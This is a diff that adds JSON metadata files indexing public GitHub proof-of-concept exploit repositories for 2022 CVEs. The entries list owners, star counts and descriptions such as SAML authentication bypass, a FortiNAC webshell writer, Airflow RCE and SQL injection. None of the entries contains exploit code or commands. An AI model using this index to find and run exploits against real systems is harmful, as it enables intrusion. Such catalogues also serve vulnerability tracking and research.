"doyensec", + "id": 25747968, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25747968?v=4", + "html_url": "https:\/\/github.com\/doyensec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/doyensec\/CVE-2022-39299_PoC_Generator", + "description": "A Simple CVE-2022-39299 PoC exploit generator to bypass authentication in SAML SSO Integrations using vulnerable versions of passport-saml", + "fork": false, + "created_at": "2022-10-31T13:24:34Z", + "updated_at": "2023-11-13T14:48:00Z", + "pushed_at": "2023-02-08T17:24:05Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 17, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3942.json b/2022/CVE-2022-3942.json new file mode 100644 index 0000000000..d1fc4f995c --- /dev/null +++ b/2022/CVE-2022-3942.json @@ -0,0 +1,33 @@ +[ + { + "id": 564714698, + "name": "CVE-2022-3942", + "full_name": "maikroservice\/CVE-2022-3942", + "owner": { + "login": "maikroservice", + "id": 20245897, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20245897?v=4", + "html_url": "https:\/\/github.com\/maikroservice", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/maikroservice\/CVE-2022-3942", + "description": null, + "fork": false, + "created_at": "2022-11-11T10:24:01Z", + "updated_at": "2022-11-11T10:24:01Z", + "pushed_at": "2022-11-20T19:30:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-39425.json b/2022/CVE-2022-39425.json new file mode 100644 index 0000000000..78b46b6404 --- /dev/null +++ b/2022/CVE-2022-39425.json @@ -0,0 +1,33 @@ +[ + { + "id": 569739742, + "name": "CVE-2022-39425", + "full_name": "bob11vrdp\/CVE-2022-39425", + "owner": { + "login": "bob11vrdp", + "id": 114571680, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114571680?v=4", + "html_url": "https:\/\/github.com\/bob11vrdp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bob11vrdp\/CVE-2022-39425", + "description": "CVE-2022-39425 PoC", + "fork": false, + "created_at": "2022-11-23T14:03:43Z", + "updated_at": "2023-11-03T07:37:51Z", + "pushed_at": "2022-12-08T08:04:47Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3949.json b/2022/CVE-2022-3949.json new file mode 100644 index 0000000000..55d63129c3 --- /dev/null +++ b/2022/CVE-2022-3949.json @@ -0,0 +1,33 @@ +[ + { + "id": 564753737, + "name": "CVE-2022-3949", + "full_name": "maikroservice\/CVE-2022-3949", + "owner": { + "login": "maikroservice", + "id": 20245897, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20245897?v=4", + "html_url": "https:\/\/github.com\/maikroservice", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/maikroservice\/CVE-2022-3949", + "description": "XSS in Simple Cashiering System", + "fork": false, + "created_at": "2022-11-11T12:21:51Z", + "updated_at": "2022-11-13T15:54:13Z", + "pushed_at": "2022-11-11T12:31:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-39802.json b/2022/CVE-2022-39802.json new file mode 100644 index 0000000000..cdd26e84b5 --- /dev/null +++ b/2022/CVE-2022-39802.json @@ -0,0 +1,72 @@ +[ + { + "id": 552505373, + "name": "CVE-2022-39802", + "full_name": "vah13\/CVE-2022-39802", + "owner": { + "login": "vah13", + "id": 7976421, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7976421?v=4", + "html_url": "https:\/\/github.com\/vah13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vah13\/CVE-2022-39802", + "description": "[CVE-2022-39802] File path traversal vulnerability in SAP Manufacturing Execution", + "fork": false, + "created_at": "2022-10-16T18:40:27Z", + "updated_at": "2022-10-16T18:40:27Z", + "pushed_at": "2022-10-16T18:40:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 552505537, + "name": "CVE-2022-39802", + "full_name": "redrays-io\/CVE-2022-39802", + "owner": { + "login": "redrays-io", + "id": 89958617, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89958617?v=4", + "html_url": "https:\/\/github.com\/redrays-io", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/redrays-io\/CVE-2022-39802", + "description": "[CVE-2022-39802] File path traversal vulnerability in SAP Manufacturing Execution", + "fork": false, + "created_at": "2022-10-16T18:40:56Z", + "updated_at": "2023-01-04T21:21:15Z", + "pushed_at": "2022-10-16T18:48:25Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "cve", + "exploit", + "sap", + "security", + "vulnerability", + "zero-day" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-39838.json b/2022/CVE-2022-39838.json new file mode 100644 index 0000000000..1aa4268da6 --- /dev/null +++ b/2022/CVE-2022-39838.json @@ -0,0 +1,33 @@ +[ + { + "id": 532933208, + "name": "CVE-2022-39838", + "full_name": "jet-pentest\/CVE-2022-39838", + "owner": { + "login": "jet-pentest", + "id": 71512502, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71512502?v=4", + "html_url": "https:\/\/github.com\/jet-pentest", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jet-pentest\/CVE-2022-39838", + "description": null, + "fork": false, + "created_at": "2022-09-05T14:21:12Z", + "updated_at": "2022-09-06T19:01:16Z", + "pushed_at": "2022-09-05T14:29:11Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-39841.json b/2022/CVE-2022-39841.json new file mode 100644 index 0000000000..0c250331a0 --- /dev/null +++ b/2022/CVE-2022-39841.json @@ -0,0 +1,33 @@ +[ + { + "id": 532900425, + "name": "CVE-2022-39841", + "full_name": "stealthcopter\/CVE-2022-39841", + "owner": { + "login": "stealthcopter", + "id": 1211162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1211162?v=4", + "html_url": "https:\/\/github.com\/stealthcopter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/stealthcopter\/CVE-2022-39841", + "description": null, + "fork": false, + "created_at": "2022-09-05T12:54:26Z", + "updated_at": "2022-09-15T14:51:04Z", + "pushed_at": "2022-09-15T14:50:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3992.json b/2022/CVE-2022-3992.json new file mode 100644 index 0000000000..a21e2aae5c --- /dev/null +++ b/2022/CVE-2022-3992.json @@ -0,0 +1,33 @@ +[ + { + "id": 568063140, + "name": "CVE-2022-3992", + "full_name": "Urban4\/CVE-2022-3992", + "owner": { + "login": "Urban4", + "id": 81638590, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81638590?v=4", + "html_url": "https:\/\/github.com\/Urban4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Urban4\/CVE-2022-3992", + "description": "Cross Site Scripting on sanitization-management-system", + "fork": false, + "created_at": "2022-11-19T10:36:37Z", + "updated_at": "2022-11-19T10:36:37Z", + "pushed_at": "2022-11-19T11:42:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-39952.json b/2022/CVE-2022-39952.json new file mode 100644 index 0000000000..e4a66f88c2 --- /dev/null +++ b/2022/CVE-2022-39952.json @@ -0,0 +1,126 @@ +[ + { + "id": 604210945, + "name": "CVE-2022-39952", + "full_name": "horizon3ai\/CVE-2022-39952", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2022-39952", + "description": "POC for CVE-2022-39952", + "fork": false, + "created_at": "2023-02-20T15:12:33Z", + "updated_at": "2024-08-15T09:12:03Z", + "pushed_at": "2023-02-25T08:52:03Z", + "stargazers_count": 266, + "watchers_count": 266, + "has_discussions": false, + "forks_count": 52, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 52, + "watchers": 266, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 604936934, + "name": "CVE-2022-39952_webshell", + "full_name": "shiyeshu\/CVE-2022-39952_webshell", + "owner": { + "login": "shiyeshu", + "id": 23716358, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23716358?v=4", + "html_url": "https:\/\/github.com\/shiyeshu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shiyeshu\/CVE-2022-39952_webshell", + "description": "Write Behinder_webshell to target using CVE-2022-39952", + "fork": false, + "created_at": "2023-02-22T04:57:06Z", + "updated_at": "2023-02-22T06:36:43Z", + "pushed_at": "2023-02-22T05:01:29Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 606840385, + "name": "CVE-2022-39952", + "full_name": "Chocapikk\/CVE-2022-39952", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2022-39952", + "description": "PoC for CVE-2022-39952 affecting Fortinet FortiNAC.", + "fork": false, + "created_at": "2023-02-26T18:10:04Z", + "updated_at": "2024-08-12T20:30:00Z", + "pushed_at": "2023-02-26T18:13:50Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 619925116, + "name": "CVE-2022-39952-better", + "full_name": "dkstar11q\/CVE-2022-39952-better", + "owner": { + "login": "dkstar11q", + "id": 123830677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123830677?v=4", + "html_url": "https:\/\/github.com\/dkstar11q", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dkstar11q\/CVE-2022-39952-better", + "description": "PoC for CVE-2022-39952 affecting Fortinet FortiNAC.", + "fork": false, + "created_at": "2023-03-27T17:25:17Z", + "updated_at": "2023-02-26T18:26:27Z", + "pushed_at": "2023-02-26T18:13:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-39959.json b/2022/CVE-2022-39959.json new file mode 100644 index 0000000000..b6a181b5fe --- /dev/null +++ b/2022/CVE-2022-39959.json @@ -0,0 +1,38 @@ +[ + { + "id": 545030714, + "name": "CVE-2022-39959", + "full_name": "usmarine2141\/CVE-2022-39959", + "owner": { + "login": "usmarine2141", + "id": 20714147, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20714147?v=4", + "html_url": "https:\/\/github.com\/usmarine2141", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/usmarine2141\/CVE-2022-39959", + "description": "CVE-2022-39959", + "fork": false, + "created_at": "2022-10-03T16:59:06Z", + "updated_at": "2022-10-08T01:03:42Z", + "pushed_at": "2022-10-07T06:27:07Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exploits", + "vulnerabilities", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-39986.json b/2022/CVE-2022-39986.json new file mode 100644 index 0000000000..9eedf9ec05 --- /dev/null +++ b/2022/CVE-2022-39986.json @@ -0,0 +1,64 @@ +[ + { + "id": 682662263, + "name": "CVE-2022-39986", + "full_name": "mind2hex\/CVE-2022-39986", + "owner": { + "login": "mind2hex", + "id": 51345640, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51345640?v=4", + "html_url": "https:\/\/github.com\/mind2hex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mind2hex\/CVE-2022-39986", + "description": "bash script for automated discovery and exploitation of machines with the CVE-2022-39986 vulnerability", + "fork": false, + "created_at": "2023-08-24T16:48:27Z", + "updated_at": "2024-03-28T19:44:25Z", + "pushed_at": "2023-11-28T19:59:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 683905565, + "name": "RaspAP-CVE-2022-39986-PoC", + "full_name": "tucommenceapousser\/RaspAP-CVE-2022-39986-PoC", + "owner": { + "login": "tucommenceapousser", + "id": 129875733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4", + "html_url": "https:\/\/github.com\/tucommenceapousser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tucommenceapousser\/RaspAP-CVE-2022-39986-PoC", + "description": "CVE-2022-39986 PoC", + "fork": false, + "created_at": "2023-08-28T03:13:10Z", + "updated_at": "2023-12-29T10:06:48Z", + "pushed_at": "2023-08-16T11:32:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-39987.json b/2022/CVE-2022-39987.json new file mode 100644 index 0000000000..20eb62b85d --- /dev/null +++ b/2022/CVE-2022-39987.json @@ -0,0 +1,95 @@ +[ + { + "id": 786209776, + "name": "CVE-2022-39987-2", + "full_name": "miguelc49\/CVE-2022-39987-2", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2022-39987-2", + "description": null, + "fork": false, + "created_at": "2024-04-13T18:46:17Z", + "updated_at": "2024-04-14T17:39:14Z", + "pushed_at": "2024-04-14T17:39:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786209800, + "name": "CVE-2022-39987-1", + "full_name": "miguelc49\/CVE-2022-39987-1", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2022-39987-1", + "description": null, + "fork": false, + "created_at": "2024-04-13T18:46:22Z", + "updated_at": "2024-04-14T17:39:10Z", + "pushed_at": "2024-04-14T17:39:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786209822, + "name": "CVE-2022-39987-3", + "full_name": "miguelc49\/CVE-2022-39987-3", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2022-39987-3", + "description": null, + "fork": false, + "created_at": "2024-04-13T18:46:27Z", + "updated_at": "2024-04-14T17:39:19Z", + "pushed_at": "2024-04-14T17:39:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40032.json b/2022/CVE-2022-40032.json new file mode 100644 index 0000000000..0561290654 --- /dev/null +++ b/2022/CVE-2022-40032.json @@ -0,0 +1,33 @@ +[ + { + "id": 602335571, + "name": "CVE-2022-40032_Simple-Task-Managing-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated", + "full_name": "h4md153v63n\/CVE-2022-40032_Simple-Task-Managing-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated", + "owner": { + "login": "h4md153v63n", + "id": 5091265, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5091265?v=4", + "html_url": "https:\/\/github.com\/h4md153v63n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h4md153v63n\/CVE-2022-40032_Simple-Task-Managing-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated", + "description": "CVE-2022-40032: Simple Task Managing System - 'login' and 'password' SQL Injection (Unauthenticated)", + "fork": false, + "created_at": "2023-02-16T01:42:48Z", + "updated_at": "2024-05-03T10:38:29Z", + "pushed_at": "2023-12-25T19:09:13Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40126.json b/2022/CVE-2022-40126.json new file mode 100644 index 0000000000..e2a405d48e --- /dev/null +++ b/2022/CVE-2022-40126.json @@ -0,0 +1,33 @@ +[ + { + "id": 543153174, + "name": "CVE-2022-40126", + "full_name": "LovelyWei\/CVE-2022-40126", + "owner": { + "login": "LovelyWei", + "id": 16489620, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16489620?v=4", + "html_url": "https:\/\/github.com\/LovelyWei", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LovelyWei\/CVE-2022-40126", + "description": "Don't be evil.", + "fork": false, + "created_at": "2022-09-29T13:59:44Z", + "updated_at": "2022-09-30T05:49:04Z", + "pushed_at": "2022-09-29T14:01:27Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40127.json b/2022/CVE-2022-40127.json new file mode 100644 index 0000000000..1c5f8404e2 --- /dev/null +++ b/2022/CVE-2022-40127.json @@ -0,0 +1,69 @@ +[ + { + "id": 567740887, + "name": "CVE-2022-40127", + "full_name": "Mr-xn\/CVE-2022-40127", + "owner": { + "login": "Mr-xn", + "id": 18260135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18260135?v=4", + "html_url": "https:\/\/github.com\/Mr-xn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-xn\/CVE-2022-40127", + "description": "Apache Airflow < 2.4.0 DAG example_bash_operator RCE POC", + "fork": false, + "created_at": "2022-11-18T13:19:23Z", + "updated_at": "2024-02-27T08:16:56Z", + "pushed_at": "2022-11-19T10:35:50Z", + "stargazers_count": 40, + "watchers_count": 40, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache-airflow", + "cve", + "poc", + "rce" + ], + "visibility": "public", + "forks": 6, + "watchers": 40, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 669143228, + "name": "CVE-2022-40127-Airflow-RCE", + "full_name": "jakabakos\/CVE-2022-40127-Airflow-RCE", + "owner": { + "login": "jakabakos", + "id": 42498816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4", + "html_url": "https:\/\/github.com\/jakabakos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakabakos\/CVE-2022-40127-Airflow-RCE", + "description": "CVE-2022-40127 PoC and exploit", + "fork": false, + "created_at": "2023-07-21T12:55:16Z", + "updated_at": "2024-06-06T11:58:59Z", + "pushed_at": "2023-08-03T11:10:16Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40140.json b/2022/CVE-2022-40140.json new file mode 100644 index 0000000000..610d131170 --- /dev/null +++ b/2022/CVE-2022-40140.json @@ -0,0 +1,95 @@ +[ + { + "id": 544338779, + "name": "NotProxyShellHunter", + "full_name": "mr-r3b00t\/NotProxyShellHunter", + "owner": { + "login": "mr-r3b00t", + "id": 14963690, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14963690?v=4", + "html_url": "https:\/\/github.com\/mr-r3b00t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mr-r3b00t\/NotProxyShellHunter", + "description": "Check for NotProxyShell CVE-2022-40140 & CVE-2022-41082", + "fork": false, + "created_at": "2022-10-02T08:14:03Z", + "updated_at": "2024-08-12T20:27:29Z", + "pushed_at": "2022-10-02T12:16:47Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 25, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 547154027, + "name": "NotProxyShellScanner", + "full_name": "ZephrFish\/NotProxyShellScanner", + "owner": { + "login": "ZephrFish", + "id": 5783068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5783068?v=4", + "html_url": "https:\/\/github.com\/ZephrFish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZephrFish\/NotProxyShellScanner", + "description": "Python implementation for NotProxyShell aka CVE-2022-40140 & CVE-2022-41082", + "fork": false, + "created_at": "2022-10-07T08:10:00Z", + "updated_at": "2024-08-12T20:27:36Z", + "pushed_at": "2024-05-21T10:10:10Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 564844236, + "name": "CVE-2022-40140-SCANNER", + "full_name": "ipsBruno\/CVE-2022-40140-SCANNER", + "owner": { + "login": "ipsBruno", + "id": 6839604, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6839604?v=4", + "html_url": "https:\/\/github.com\/ipsBruno", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ipsBruno\/CVE-2022-40140-SCANNER", + "description": "A Shodan hunter for CVE-2022-40140 ", + "fork": false, + "created_at": "2022-11-11T16:25:29Z", + "updated_at": "2024-08-12T20:28:18Z", + "pushed_at": "2022-11-13T23:27:02Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40146.json b/2022/CVE-2022-40146.json new file mode 100644 index 0000000000..a472a96987 --- /dev/null +++ b/2022/CVE-2022-40146.json @@ -0,0 +1,64 @@ +[ + { + "id": 560247956, + "name": "CVE-2022-40146_Exploit_Jar", + "full_name": "cckuailong\/CVE-2022-40146_Exploit_Jar", + "owner": { + "login": "cckuailong", + "id": 10824150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10824150?v=4", + "html_url": "https:\/\/github.com\/cckuailong", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cckuailong\/CVE-2022-40146_Exploit_Jar", + "description": null, + "fork": false, + "created_at": "2022-11-01T03:41:36Z", + "updated_at": "2024-09-25T03:02:24Z", + "pushed_at": "2022-11-01T05:25:52Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 31, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 835802970, + "name": "CVE-2022-40146", + "full_name": "soulfoodisgood\/CVE-2022-40146", + "owner": { + "login": "soulfoodisgood", + "id": 64322368, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64322368?v=4", + "html_url": "https:\/\/github.com\/soulfoodisgood", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/soulfoodisgood\/CVE-2022-40146", + "description": "Vulnerable svg-to-png service", + "fork": false, + "created_at": "2024-07-30T15:00:00Z", + "updated_at": "2024-07-30T15:07:08Z", + "pushed_at": "2024-07-30T15:07:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40297.json b/2022/CVE-2022-40297.json new file mode 100644 index 0000000000..0206971979 --- /dev/null +++ b/2022/CVE-2022-40297.json @@ -0,0 +1,53 @@ +[ + { + "id": 532543106, + "name": "PoC-ubuntutouch-pin-privesc", + "full_name": "filipkarc\/PoC-ubuntutouch-pin-privesc", + "owner": { + "login": "filipkarc", + "id": 111286209, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111286209?v=4", + "html_url": "https:\/\/github.com\/filipkarc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/filipkarc\/PoC-ubuntutouch-pin-privesc", + "description": "CVE-2022-40297 - Proof of Concept: Privilege escalation in Ubuntu Touch 16.04 - by PIN Bruteforce", + "fork": false, + "created_at": "2022-09-04T13:05:58Z", + "updated_at": "2024-02-24T11:42:43Z", + "pushed_at": "2022-09-15T09:34:35Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "brute-force", + "bruteforce", + "bugbountytips", + "bugbountytricks", + "cve", + "exploit", + "hacking", + "linux", + "linuxphone", + "malware", + "mobile", + "mobile-hacking", + "mobilehacking", + "pentesting", + "privesc", + "ubuntu", + "ubuntutouch", + "vulnerability", + "vulnerability-assessment" + ], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40317.json b/2022/CVE-2022-40317.json new file mode 100644 index 0000000000..a3fef4fa10 --- /dev/null +++ b/2022/CVE-2022-40317.json @@ -0,0 +1,33 @@ +[ + { + "id": 534698979, + "name": "CVE-2022-40317", + "full_name": "izdiwho\/CVE-2022-40317", + "owner": { + "login": "izdiwho", + "id": 5587598, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5587598?v=4", + "html_url": "https:\/\/github.com\/izdiwho", + "user_view_type": "public" + }, + "html_url": 